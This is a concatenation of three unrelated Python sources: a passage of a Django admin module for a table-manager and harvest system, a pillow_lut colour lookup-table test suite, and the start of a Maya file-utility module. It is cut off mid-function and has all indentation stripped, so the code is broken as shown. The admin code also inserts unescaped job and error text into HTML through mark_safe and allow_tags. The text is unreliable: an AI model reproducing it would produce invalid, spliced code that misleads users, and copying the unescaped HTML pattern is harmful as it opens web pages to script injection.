InputForm,NormalTableForm,WorkspaceForm,DataSourceForm,
PublishChannelForm,
)
from harvest.models import Job
from harvest.jobstates import JobState
from borg.admin import site
from harvest.jobstatemachine import JobStatemachine
from borg_utils.jobintervals import JobInterval
from borg_utils.borg_config import BorgConfiguration
from borg_utils.resource_status import ResourceStatus
from borg_utils.hg_batch_push import try_set_push_owner, try_clear_push_owner, increase_committed_changes, try_push_to_repository
logger = logging.getLogger(__name__)
def instantiate(modeladmin, request, queryset):
for table in queryset:
table.instantiate()
instantiate.short_description = "Create selected tables in database"
class JobFields(object):
def _job_status(self,o):
if o.job_id:
try:
j = Job.objects.get(pk=o.job_id)
state = JobState.get_jobstate(j.state)
if state.is_end_state:
return state.name
elif state.is_error_state:
return "Waiting approve" if state.is_interactive_state else "Error"
else:
return "running"
except:
return ""
else:
return ""
_job_status.short_description = "Job Status"
def _job_id(self,o):
if o.job_id:
return "<a href='/harvest/job/{0}/'>{0}</a>".format(o.job_id)
else:
return ''
_job_id.allow_tags = True
_job_id.short_description = "Job ID"
_job_id.admin_order_field = "job_id"
def _job_batch_id(self,o):
if o.job_batch_id:
return "<a href='/harvest/job/?q={0}'>{0}</a>".format(o.job_batch_id)
else:
return ''
_job_batch_id.allow_tags = True
_job_batch_id.short_description = "Job Batch ID"
_job_batch_id.admin_order_field = "job_batch_id"
def _job_message(self,o):
if o.job_message:
return "<p style='white-space:pre'>" + o.job_message + "</p>"
else:
return ''
_job_message.allow_tags = True
_job_message.short_description = "Job message"
class PublishChannelAdmin(VersionAdmin):
list_display = ("name", "sync_postgres_data","sync_geoserver_data","last_modify_time")
readonly_fields = ("last_modify_time",)
form = PublishChannelForm
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirmation page, or the user did not confirm
return self.default_delete_action[0](self,request,queryset)
#the user confirmed the deletion of the selected publish channels; run the custom delete logic.
result = None
failed_publish_channels = []
try_set_push_owner("publish_channel_admin",enforce=True)
warning_message = None
try:
for publish_channel in queryset:
try:
with transaction.atomic():
publish_channel.delete()
except:
error = sys.exc_info()
failed_publish_channels.append((publish_channel.name,traceback.format_exception_only(error[0],error[1])))
#deletion failed; continue with the next publish_channel
continue
try:
try_push_to_repository('publish_channel_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("publish_channel_admin",enforce=True)
if failed_publish_channels or warning_message:
if failed_publish_channels:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected publish channels are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_publish_channels]))))
else:
messages.warning(request, mark_safe("Some selected publish channels are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_publish_channels]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected publish channels are deleted successfully")
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(PublishChannelAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (PublishChannelAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
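# custom_delete_selected and get_actions above are repeated almost verbatim by
# every admin class in this module, differing only in the push-owner key and
# the object label used in the messages. A hedged sketch of a mixin that could
# deduplicate them follows; it is an illustration, not code that exists in this
# project, and it omits the warning_message plumbing for brevity.
class CustomDeleteMixin(object):
    push_owner_key = None   # e.g. "publish_channel_admin"
    object_label = None     # e.g. "publish channels"

    def custom_delete_selected(self, request, queryset):
        if request.POST.get('post') != 'yes':
            # show the confirmation page, or the user did not confirm
            return self.default_delete_action[0](self, request, queryset)
        failed = []
        try_set_push_owner(self.push_owner_key, enforce=True)
        try:
            for obj in queryset:
                try:
                    with transaction.atomic():
                        obj.delete()
                except:
                    error = sys.exc_info()
                    failed.append((obj.name, traceback.format_exception_only(error[0], error[1])))
            try_push_to_repository(self.push_owner_key, enforce=True)
        finally:
            try_clear_push_owner(self.push_owner_key, enforce=True)
        if failed:
            messages.warning(request, mark_safe("Failed to delete some selected {0}:<ul>{1}</ul>".format(
                self.object_label, "".join("<li>{0} : {1}</li>".format(o[0], o[1]) for o in failed))))
        else:
            messages.success(request, "All selected {0} were deleted successfully".format(self.object_label))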
class DataSourceAdmin(VersionAdmin):
list_display = ("name","type", "last_modify_time")
search_fields = ["name"]
form = DataSourceForm
def get_fields(self, request, obj=None):
if ((obj.type if obj else request.POST.get("type")) == DatasourceType.DATABASE):
base_fields = ["name","type","description","user","password","sql","vrt"]
else:
base_fields = ["name","type","description","vrt"]
return base_fields + list(self.get_readonly_fields(request, obj))
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirmation page, or the user did not confirm
return self.default_delete_action[0](self,request,queryset)
#the user confirmed the deletion of the selected datasources; run the custom delete logic.
result = None
failed_datasources = []
try_set_push_owner("datasource_admin",enforce=True)
warning_message = None
try:
for datasource in queryset:
try:
with transaction.atomic():
datasource.delete()
except:
error = sys.exc_info()
failed_datasources.append((datasource.name,traceback.format_exception_only(error[0],error[1])))
#deletion failed; continue with the next datasource
continue
try:
try_push_to_repository('datasource_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("datasource_admin",enforce=True)
if failed_datasources or warning_message:
if failed_datasources:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected datasources are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_datasources]))))
else:
messages.warning(request, mark_safe("Some selected datasources are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_datasources]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected datasources are deleted successfully")
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(DataSourceAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (DataSourceAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
class WorkspaceAdmin(VersionAdmin):
list_display = ("name","_publish_channel","auth_level","_schema","_test_schema",)
readonly_fields = ("_schema","_view_schema","_test_schema","_test_view_schema")
#actions = [instantiate]
search_fields = ["name"]
form = WorkspaceForm
def _publish_channel(self,o):
return "<a href='/tablemanager/publishchannel/{0}/'>{1}</a>".format(o.publish_channel.pk,o.publish_channel)
_publish_channel.allow_tags = True
_publish_channel.short_description = "Publish channel"
def _schema(self,o):
return o.schema
_schema.short_description = "Schema"
def _view_schema(self,o):
return o.view_schema
_view_schema.short_description = "View Schema"
def _test_schema(self,o):
return o.test_schema
_test_schema.short_description = "Test Schema"
def _test_view_schema(self,o):
return o.test_view_schema
_test_view_schema.short_description = "Test View Schema"
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirmation page, or the user did not confirm
return self.default_delete_action[0](self,request,queryset)
#the user confirmed the deletion of the selected workspaces; run the custom delete logic.
result = None
failed_workspaces = []
try_set_push_owner("workspace_admin",enforce=True)
warning_message = None
try:
for workspace in queryset:
try:
with transaction.atomic():
workspace.delete()
except:
error = sys.exc_info()
failed_workspaces.append((workspace.name,traceback.format_exception_only(error[0],error[1])))
#deletion failed; continue with the next workspace
continue
try:
try_push_to_repository('workspace_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("workspace_admin",enforce=True)
if failed_workspaces or warning_message:
if failed_workspaces:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected workspaces are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_workspaces]))))
else:
messages.warning(request, mark_safe("Some selected workspaces are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_workspaces]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected workspaces are deleted successfully")
def publish(self,request,queryset):
result = None
failed_objects = []
#import ipdb;ipdb.set_trace()
try_set_push_owner("workspace_admin",enforce=True)
warning_message = None
try:
for workspace in queryset:
try:
workspace.publish()
except:
error = sys.exc_info()
failed_objects.append((workspace.name,traceback.format_exception_only(error[0],error[1])))
#publish failed; continue with the next workspace
continue
try:
try_push_to_repository('workspace_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("workspace_admin",enforce=True)
if failed_objects or warning_message:
if failed_objects:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Pushing changes to repository failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_objects]))))
else:
messages.warning(request, mark_safe("Publish failed for some selected workspaces:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_objects]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "Publish successfully for all selected workspaces")
publish.short_description = "Publish"
actions = ['publish']
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(WorkspaceAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (WorkspaceAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
class ForeignTableAdmin(VersionAdmin):
list_display = ("name","_server","last_modify_time")
readonly_fields = ("last_modify_time",)
#actions = [instantiate]
search_fields = ["name"]
form = ForeignTableForm
def _server(self,o):
return "<a href='/tablemanager/datasource/{0}/'>{1}</a>".format(o.server.pk,o.server.name)
_server.allow_tags = True
_server.short_description = "Server"
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirmation page, or the user did not confirm
return self.default_delete_action[0](self,request,queryset)
#the user confirmed the deletion of the selected foreign tables; run the custom delete logic.
result = None
failed_foreign_tables = []
try_set_push_owner("foreign_table_admin",enforce=True)
warning_message = None
try:
for foreign_table in queryset:
try:
with transaction.atomic():
foreign_table.delete()
except:
error = sys.exc_info()
failed_foreign_tables.append((foreign_table.name,traceback.format_exception_only(error[0],error[1])))
#deletion failed; continue with the next foreign_table
continue
try:
try_push_to_repository('foreign_table_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("foreign_table_admin",enforce=True)
if failed_foreign_tables or warning_message:
if failed_foreign_tables:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected foreign tables are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_foreign_tables]))))
else:
messages.warning(request, mark_safe("Some selected foreign tables are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_foreign_tables]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected foreign tables are deleted successfully")
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(ForeignTableAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (ForeignTableAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
def _up_to_date(o):
return o.is_up_to_date()
_up_to_date.short_description = "Up to date"
_up_to_date.boolean = True
class NormalTableAdmin(VersionAdmin):
list_display = ("name","_normalise","last_modify_time",_up_to_date)
#actions = [instantiate]
readonly_fields = ("_normalise","last_modify_time",_up_to_date)
search_fields = ["name"]
form = NormalTableForm
def _normalise(self,o):
if o.normalise:
return "<a href='/tablemanager/normalise/{0}/'>{1}</a>".format(o.normalise.pk,o.normalise)
else:
return ""
_normalise.allow_tags = True
_normalise.short_description = "Normalise"
def custom_delete_selected(self,request,queryset):
if request.POST.get('post') != 'yes':
#the confirmation page, or the user did not confirm
return self.default_delete_action[0](self,request,queryset)
#the user confirmed the deletion of the selected normal tables; run the custom delete logic.
result = None
failed_normal_tables = []
try_set_push_owner("normal_table_admin",enforce=True)
warning_message = None
try:
for normal_table in queryset:
try:
with transaction.atomic():
normal_table.delete()
except:
error = sys.exc_info()
failed_normal_tables.append((normal_table.name,traceback.format_exception_only(error[0],error[1])))
#deletion failed; continue with the next normal_table
continue
try:
try_push_to_repository('normal_table_admin',enforce=True)
except:
error = sys.exc_info()
warning_message = traceback.format_exception_only(error[0],error[1])
logger.error(traceback.format_exc())
finally:
try_clear_push_owner("normal_table_admin",enforce=True)
if failed_normal_tables or warning_message:
if failed_normal_tables:
if warning_message:
messages.warning(request, mark_safe("<ul><li>{0}</li><li>Some selected normal tables are deleted failed:<ul>{1}</ul></li></ul>".format(warning_message,"".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_normal_tables]))))
else:
messages.warning(request, mark_safe("Some selected normal tables are deleted failed:<ul>{0}</ul>".format("".join(["<li>{0} : {1}</li>".format(o[0],o[1]) for o in failed_normal_tables]))))
else:
messages.warning(request, mark_safe(warning_message))
else:
messages.success(request, "All selected normal tables are deleted successfully")
def get_actions(self, request):
#import ipdb;ipdb.set_trace()
actions = super(NormalTableAdmin, self).get_actions(request)
self.default_delete_action = actions['delete_selected']
del actions['delete_selected']
actions['delete_selected'] = (NormalTableAdmin.custom_delete_selected,self.default_delete_action[1],self.default_delete_action[2])
return actions
class InputAdmin(VersionAdmin,JobFields):
list_display = ("name","_data_source", "geometry", "extent", "count","last_modify_time",_up_to_date,"_job_id", "_job_batch_id", "_job_status")
readonly_fields = ("spatial_info_desc","_style_file","title","abstract","_create_table_sql","ds_modify_time","last_modify_time",_up_to_date,"_job_batch_id","_job_id","_job_status","_job_message")
search_fields = ["name","data_source__name"]
form = InputForm
def get_fields(self, request, obj=None):
if (obj and hasattr(obj,"data_source")) or "data_source" in request.POST:
if (obj.data_source.type if obj else DataSource.objects.get(pk=int(request.POST.get("data_source"))).type) == DatasourceType.DATABASE:
if hasattr(obj,"foreign_table") if obj else "foreign_table" in request.POST:
base_fields = ["name","data_source","foreign_table","generate_rowid","source"]
else:
base_fields = ["name","data_source","foreign_table"]
else:
base_fields = ["name","data_source","generate_rowid","source"]
else:
base_fields = ["name","data_source"]
return base_fields + list(self.get_readonly_fields(request, obj))
def _data_source(self,o):
return "<a href='/tablemanager/datasource/{0}/'>{1}</a>".format(o.data_source.pk,o.data_source)
_data_source.allow_tags = True
_data_source.short_description = "Datasource"
def _style_file(self,o):
if o.style_file():
return o.style_file()
else:
return ""
_style_file.short_description = "Style file"
def _create_table_sql(self,o):
if o.create_table_sql:
return "<p style='white-space:pre'>" + o.create_table_sql + "</p>"
else:
return ''
_create_table_sql.allow_tags = True
_create_table_sql.short_description = "CREATE info for table"
from __future__ import division, unicode_literals, absolute_import
import warnings
from pillow_lut import operations, generators, ImageFilter, Image
from pillow_lut import (identity_table, transform_lut, resize_lut, amplify_lut,
sample_lut_linear, sample_lut_cubic)
from . import PillowTestCase, disable_numpy
class TestSampleLutLinear(PillowTestCase):
def test_identity_2(self):
identity = identity_table(2)
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_linear(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_identity_17(self):
identity = identity_table(17)
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_linear(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_identity_sizes(self):
identity = identity_table((5, 6, 7))
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_linear(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_interpolation(self):
lut = ImageFilter.Color3DLUT.generate(3, lambda r, g, b:
(r, g*g, b*b + r))
for point, res in [
(( 0, 0, 0), ( 0, 0, 0)),
((.3, 0, 0), (.3, 0, .3)),
((.6, 0, 0), (.6, 0, .6)),
(( 1, 0, 0), ( 1, 0, 1)),
((0, 0, 0), (0, 0, 0)),
((0, .3, 0), (0,.15, 0)),
((0, .6, 0), (0, .4, 0)),
((0, 1, 0), (0, 1, 0)),
((0, 0, 0), (0, 0, 0)),
((0, 0, .3), (0, 0,.15)),
((0, 0, .6), (0, 0, .4)),
((0, 0, 1), (0, 0, 1)),
(( 0, 0, 0), ( 0, 0, 0)),
((.3, .3, .3), (.3,.15,.45)),
((.6, .6, .6), (.6, .4, 1)),
(( 1, 1, 1), ( 1, 1, 2)),
]:
for l, r in zip(sample_lut_linear(lut, point), res):
self.assertAlmostEqual(l, r)
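# A standalone sketch of what the loops above assert (not part of the test
# suite): sampling an identity table with linear interpolation returns the
# input point unchanged, including points outside [0, 1], because every
# lattice point of identity_table maps to itself.
#
#   lut = identity_table(9)
#   sample_lut_linear(lut, (0.25, 0.5, 0.75))  # ~= (0.25, 0.5, 0.75)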
class TestSampleLutCubic(PillowTestCase):
def test_identity_2(self):
identity = identity_table(2)
with self.assertRaisesRegexp(ValueError, "requires a table of size 4"):
sample_lut_cubic(identity, (0, 0, 0))
def test_identity_4(self):
identity = identity_table(4)
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_cubic(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_identity_17(self):
identity = identity_table(17)
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_cubic(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_identity_sizes(self):
identity = identity_table((5, 6, 7))
data = [-1.1, -0.3, 0, 0.1, 0.5, 1, 1.1]
for b in data:
for g in data:
for r in data:
point = sample_lut_cubic(identity, (r, g, b))
for left, right in zip(point, (r, g, b)):
self.assertAlmostEqual(left, right)
def test_interpolation(self):
lut = ImageFilter.Color3DLUT.generate(5, lambda r, g, b:
(r, g*g, b*b + r))
for point, res in [
(( 0, 0, 0), ( 0, 0, 0)),
((.3, 0, 0), (.3, 0, .3)),
((.6, 0, 0), (.6, 0, .6)),
(( 1, 0, 0), ( 1, 0, 1)),
((0, 0, 0), (0, 0, 0)),
((0, .3, 0), (0,.09, 0)),
((0, .6, 0), (0,.36, 0)),
((0, 1, 0), (0, 1, 0)),
((0, 0, 0), (0, 0, 0)),
((0, 0, .3), (0, 0,.09)),
((0, 0, .6), (0, 0,.36)),
((0, 0, 1), (0, 0, 1)),
(( 0, 0, 0), ( 0, 0, 0)),
((.3, .3, .3), (.3,.09,.39)),
((.6, .6, .6), (.6,.36,.96)),
(( 1, 1, 1), ( 1, 1, 2)),
]:
for l, r in zip(sample_lut_cubic(lut, point), res):
self.assertAlmostEqual(l, r)
class TestResizeLut(PillowTestCase):
identity7 = identity_table(7)
identity9 = identity_table(9)
lut7_in = ImageFilter.Color3DLUT.generate(7,
lambda r, g, b: (r**1.2, g**1.2, b**1.2))
lut7_out = ImageFilter.Color3DLUT.generate(7,
lambda r, g, b: (r**(1/1.2), g**(1/1.2), b**(1/1.2)))
lut9_in = ImageFilter.Color3DLUT.generate(9,
lambda r, g, b: (r**1.2, g**1.2, b**1.2))
lut5_4c = ImageFilter.Color3DLUT.generate(5, channels=4,
callback=lambda r, g, b: (r*r, g*g, b*b, 1.0))
def test_wrong_args(self):
with self.assertRaisesRegexp(ValueError, "interpolations"):
result = resize_lut(identity_table(4), 5,
interp=Image.NEAREST)
def test_correct_args(self):
result = resize_lut(identity_table((3, 4, 5), target_mode='RGB'),
(6, 7, 8))
self.assertEqual(tuple(result.size), (6, 7, 8))
self.assertEqual(result.mode, 'RGB')
self.assertEqual(result.channels, 3)
result = resize_lut(self.lut5_4c, 3)
self.assertEqual(tuple(result.size), (3, 3, 3))
self.assertEqual(result.mode, None)
self.assertEqual(result.channels, 4)
with disable_numpy(operations):
result = resize_lut(self.lut5_4c, 3)
self.assertEqual(tuple(result.size), (3, 3, 3))
self.assertEqual(result.mode, None)
self.assertEqual(result.channels, 4)
def test_correctness_linear(self):
res_numpy = resize_lut(self.lut9_in, 7)
self.assertAlmostEqualLuts(res_numpy, self.lut7_in, 6)
with disable_numpy(operations):
res_native = resize_lut(self.lut9_in, 7)
self.assertAlmostEqualLuts(res_native, res_numpy)
def test_correctness_cubic(self):
result = resize_lut(self.lut9_in, 7, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.lut7_in, 7)
def test_fallback_to_linear(self):
lut3 = ImageFilter.Color3DLUT.generate((5, 5, 3),
lambda r, g, b: (r**1.5, g**1.5, b**1.5))
lut4 = ImageFilter.Color3DLUT.generate((5, 5, 4),
lambda r, g, b: (r**1.5, g**1.5, b**1.5))
with warnings.catch_warnings(record=True) as w:
cubic = resize_lut(lut4, (5, 5, 3), interp=Image.CUBIC)
self.assertEqual(len(w), 0)
linear = resize_lut(lut4, (5, 5, 3))
self.assertNotEqualLutTables(cubic, linear)
with warnings.catch_warnings(record=True) as w:
cubic = resize_lut(lut3, (5, 5, 4), interp=Image.CUBIC)
self.assertEqual(len(w), 1)
self.assertIn('Cubic interpolation', "{}".format(w[0].message))
linear = resize_lut(lut3, (5, 5, 4))
self.assertEqualLuts(cubic, linear)
def test_application(self):
im = Image.new('RGB', (10, 10))
lut_numpy = resize_lut(identity_table(5), 4)
self.assertEqual(lut_numpy.table.__class__.__name__, 'ndarray')
im.filter(lut_numpy)
with disable_numpy(operations):
lut_native = resize_lut(identity_table(5), 4)
self.assertEqual(lut_native.table.__class__.__name__, 'list')
im.filter(lut_native)
with disable_numpy(generators):
args = identity_table(5)
self.assertEqual(args.table.__class__.__name__, 'list')
lut_numpy = resize_lut(args, 4)
self.assertEqual(lut_numpy.table.__class__.__name__, 'ndarray')
im.filter(lut_numpy)
args = identity_table(5)
self.assertEqual(args.table.__class__.__name__, 'ndarray')
with disable_numpy(operations):
lut_native = resize_lut(args, 4)
self.assertEqual(lut_native.table.__class__.__name__, 'list')
im.filter(lut_native)
class TestTransformLut(PillowTestCase):
identity7 = identity_table(7)
identity9 = identity_table(9)
lut7_in = ImageFilter.Color3DLUT.generate(7,
lambda r, g, b: (r**1.2, g**1.2, b**1.2))
lut7_out = ImageFilter.Color3DLUT.generate(7,
lambda r, g, b: (r**(1/1.2), g**(1/1.2), b**(1/1.2)))
lut9_in = ImageFilter.Color3DLUT.generate(9,
lambda r, g, b: (r**1.2, g**1.2, b**1.2))
lut5_4c = ImageFilter.Color3DLUT.generate(5, channels=4,
callback=lambda r, g, b: (r*r, g*g, b*b, 1.0))
def test_wrong_args(self):
with self.assertRaisesRegexp(ValueError, "only 3-channel cubes"):
result = transform_lut(self.lut5_4c, identity_table(3))
with self.assertRaisesRegexp(ValueError, "only 3-channel cubes"):
result = transform_lut(self.lut5_4c, identity_table(3),
target_size=5)
with self.assertRaisesRegexp(ValueError, "interpolations"):
result = transform_lut(identity_table(4), identity_table(4),
interp=Image.NEAREST)
def test_correct_args(self):
result = transform_lut(identity_table((3, 4, 5), target_mode='RGB'),
identity_table((6, 7, 8), target_mode='HSV'))
self.assertEqual(tuple(result.size), (3, 4, 5))
self.assertEqual(result.mode, 'HSV')
self.assertEqual(result.channels, 3)
result = transform_lut(identity_table(3), self.lut5_4c)
self.assertEqual(tuple(result.size), (3, 3, 3))
self.assertEqual(result.mode, None)
self.assertEqual(result.channels, 4)
with disable_numpy(operations):
result = transform_lut(identity_table(3), self.lut5_4c)
self.assertEqual(tuple(result.size), (3, 3, 3))
self.assertEqual(result.mode, None)
self.assertEqual(result.channels, 4)
result = transform_lut(identity_table(4, target_mode='RGB'),
identity_table(5), target_size=(6, 7, 8))
self.assertEqual(tuple(result.size), (6, 7, 8))
self.assertEqual(result.mode, 'RGB')
self.assertEqual(result.channels, 3)
with disable_numpy(operations):
result = transform_lut(identity_table(4, target_mode='RGB'),
identity_table(5), target_size=(6, 7, 8))
self.assertEqual(tuple(result.size), (6, 7, 8))
self.assertEqual(result.mode, 'RGB')
self.assertEqual(result.channels, 3)
def test_identity_linear(self):
res_numpy = transform_lut(self.lut7_in, self.identity9)
self.assertAlmostEqualLuts(res_numpy, self.lut7_in)
with disable_numpy(operations):
res_native = transform_lut(self.lut7_in, self.identity9)
self.assertAlmostEqualLuts(res_native, res_numpy)
res_numpy = transform_lut(self.identity9, self.lut7_in)
self.assertAlmostEqualLuts(res_numpy, self.lut9_in, 4)
with disable_numpy(operations):
res_native = transform_lut(self.identity9, self.lut7_in)
self.assertAlmostEqualLuts(res_native, res_numpy)
def test_identity_cubic(self):
result = transform_lut(self.lut7_in, self.identity9, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.lut7_in)
result = transform_lut(self.identity7, self.lut9_in, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.lut7_in, 7)
def test_correctness_linear(self):
res_numpy = transform_lut(self.lut7_in, self.lut7_out)
self.assertAlmostEqualLuts(res_numpy, self.identity7, 4)
with disable_numpy(operations):
res_native = transform_lut(self.lut7_in, self.lut7_out)
self.assertAlmostEqualLuts(res_native, res_numpy)
res_numpy = transform_lut(self.lut7_out, self.lut7_in)
self.assertAlmostEqualLuts(res_numpy, self.identity7, 6)
with disable_numpy(operations):
res_native = transform_lut(self.lut7_out, self.lut7_in)
self.assertAlmostEqualLuts(res_native, res_numpy)
def test_correctness_cubic(self):
result = transform_lut(self.lut7_in, self.lut7_out, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.identity7, 4)
result = transform_lut(self.lut7_out, self.lut7_in, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.identity7, 7)
def test_target_size_correctness_linear(self):
res_numpy = transform_lut(self.lut7_out, self.lut7_in, target_size=9)
self.assertAlmostEqualLuts(res_numpy, self.identity9, 4)
with disable_numpy(operations):
res_native = transform_lut(self.lut7_out, self.lut7_in,
target_size=9)
self.assertAlmostEqualLuts(res_native, res_numpy)
def test_target_size_correctness_cubic(self):
result = transform_lut(self.lut7_out, self.lut7_in,
target_size=9, interp=Image.CUBIC)
self.assertAlmostEqualLuts(result, self.identity9, 4)
def test_fallback_to_linear(self):
lut3 = ImageFilter.Color3DLUT.generate((5, 5, 3),
lambda r, g, b: (r**1.5, g**1.5, b**1.5))
lut4 = ImageFilter.Color3DLUT.generate((5, 5, 4),
lambda r, g, b: (r**1.5, g**1.5, b**1.5))
with warnings.catch_warnings(record=True) as w:
cubic = transform_lut(identity_table((5, 5, 3)), lut4,
interp=Image.CUBIC)
self.assertEqual(len(w), 0)
linear = transform_lut(identity_table((5, 5, 3)), lut4)
self.assertNotEqualLutTables(cubic, linear)
with warnings.catch_warnings(record=True) as w:
cubic = transform_lut(identity_table((5, 5, 4)), lut3,
interp=Image.CUBIC)
self.assertEqual(len(w), 1)
self.assertIn('Cubic interpolation', "{}".format(w[0].message))
linear = transform_lut(identity_table((5, 5, 4)), lut3)
self.assertEqualLuts(cubic, linear)
with warnings.catch_warnings(record=True) as w:
cubic = transform_lut(identity_table((5, 5, 3)), lut4,
target_size=(5, 5, 4), interp=Image.CUBIC)
self.assertEqual(len(w), 1)
self.assertIn('Cubic interpolation', "{}".format(w[0].message))
linear = transform_lut(identity_table((5, 5, 3)), lut4,
target_size=(5, 5, 4))
self.assertEqualLuts(cubic, linear)
def test_application(self):
im = Image.new('RGB', (10, 10))
lut_numpy = transform_lut(identity_table(5), identity_table(5))
self.assertEqual(lut_numpy.table.__class__.__name__, 'ndarray')
im.filter(lut_numpy)
with disable_numpy(operations):
lut_native = transform_lut(identity_table(5), identity_table(5))
self.assertEqual(lut_native.table.__class__.__name__, 'list')
im.filter(lut_native)
with disable_numpy(generators):
args = identity_table(5), identity_table(5)
self.assertEqual(args[0].table.__class__.__name__, 'list')
lut_numpy = transform_lut(*args)
self.assertEqual(lut_numpy.table.__class__.__name__, 'ndarray')
im.filter(lut_numpy)
args = identity_table(5), identity_table(5)
self.assertEqual(args[0].table.__class__.__name__, 'ndarray')
with disable_numpy(operations):
lut_native = transform_lut(*args)
self.assertEqual(lut_native.table.__class__.__name__, 'list')
im.filter(lut_native)
class TestAmplifyLut(PillowTestCase):
lut5_4c = ImageFilter.Color3DLUT.generate(5, channels=4,
callback=lambda r, g, b: (r*r, g*g, b*b, 1.0))
def test_correct_args(self):
result = amplify_lut(identity_table((3, 4, 5)), -1)
self.assertEqual(tuple(result.size), (3, 4, 5))
self.assertEqual(result.channels, 3)
result = amplify_lut(self.lut5_4c, 5)
self.assertEqual(tuple(result.size), (5, 5, 5))
"""
Creating and reading file objects, as well as manipulating Maya files.
"""
# import standard modules
import posixpath
import re
import os
import xml.etree.cElementTree as ET
import json
import glob
import ast
import shutil
# import maya modules
from maya import cmds
# define local variables
# re_slash = re.compile(r'[^\\/]+|[\\/]')
re_slash = re.compile(r'(\\|/)')
def remove_file(file_name):
"""
removes this file from disk.
:param file_name: <str> file path name.
:return: <bool> True for success.
:raises: <OSError> invalid file path.
"""
os.unlink(file_name)
return True
def make_py_file(dir_name, file_name):
"""
create python file.
:param dir_name:
:param file_name:
:return:
"""
if ".py" not in file_name:
file_name += ".py"
file_path = concatenate_path(dir_name, file_name)
